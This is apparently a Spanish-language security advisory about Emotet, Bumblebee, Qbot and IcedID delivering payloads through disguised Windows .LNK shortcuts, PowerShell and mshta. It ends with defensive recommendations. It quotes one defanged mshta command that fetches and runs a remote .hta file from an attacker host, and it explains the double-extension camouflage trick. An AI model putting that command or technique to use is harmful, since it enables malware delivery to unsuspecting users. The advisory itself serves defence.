Se ha reportado un aviso de seguridad sobre una nueva tendencia de ocultar malware (emotet, bumblebee, entre otros), relacionada a archivos con extensión de acceso directo de Windows (.LNK), que permitirían a un atacante realizar ejecución remota de código (RCE).
Se ha estado rastreando constantemente las amenazas emergentes, siendo una de ellas el uso de archivos con extensión .lnk por parte de varias familias de malware. Algunas de las familias de malware prevalentes que utilizan archivos .lnk para realizar ataques son:
- Emotet
- Bumblebee
- Qbot
- Icedid
Los “.lnk”, son archivos de acceso directo que hacen referencia a otros archivos, carpetas o aplicaciones. Los atacantes aprovechan los archivos .lnk y eliminan las cargas útiles maliciosas mediante LOLBins. LOLBins (Living off the Land Binaries) binarios, que son nativos de sistemas operativos como PowerShell y mshta.
En la imagen puede ser observado un acceso directo de Windows (. LNK) archivo. De forma predeterminada, Windows oculta la extensión .lnk, por lo que si un archivo se nombra como file_name.txt.lnk, solo file_name.txt será visible para el usuario, incluso si la opción Mostrar extensión de archivo este habilitado. Por tales razones, esta podría ser una opción atractiva para los atacantes, utilizando los archivos .lnk como camuflaje.
Luego, la ejecución del archivo permitiría que el atacante realice ejecución remota de código de PowerShell, que ejecuta un archivo .hta hospedado en el sitio remoto mediante mshta.
Este script usa una función que realiza una operación matemática que convierte un valor numérico en caracteres. La siguiente figura muestra los datos afectados:
Nota: El comando utilizado es “C:\Windows\system32\mshta.exe” hxxps[:]//quantum-software[.]online/remote/bdg[.]hta
La cadena de infección se representa a continuación:
Para hacer frente a esta amenaza se recomienda realizar campañas de concientización y aplicar las siguientes buenas prácticas:
- Abstenerse de abrir enlaces que no sean de confianza y archivos adjuntos de correo electrónico sin verificar su autenticidad.
- Utilizar contraseñas seguras y aplique la autenticación multifactor siempre que sea posible.
- Verificar el origen de los archivos antes de ejecutarlos.
- Activar la función de actualización automática de software en su computadora, dispositivo móvil y otros dispositivos conectados siempre que sea posible y pragmático.
- Utilizar un paquete de software antivirus y de seguridad de Internet de renombre en sus dispositivos conectados, incluidos PC, computadora portátil y dispositivo móvil.
- Realizar prácticas de copia de seguridad periódicas y mantener esas copias de seguridad sin conexión o en una red separada.
Adicionalmente, se recomienda impedir que PowerShell ejecute comandos no autorizados ya sea, programando en una blacklist incluyendo la extensión .Ink o impidiendo el inicio automático de PowerShell en modo administrador.
Referencias:
- https://twitter.com/elhackernet/status/1541693901811187714?s=20&t=KyrWIjvja2kEXC-LSey6MQ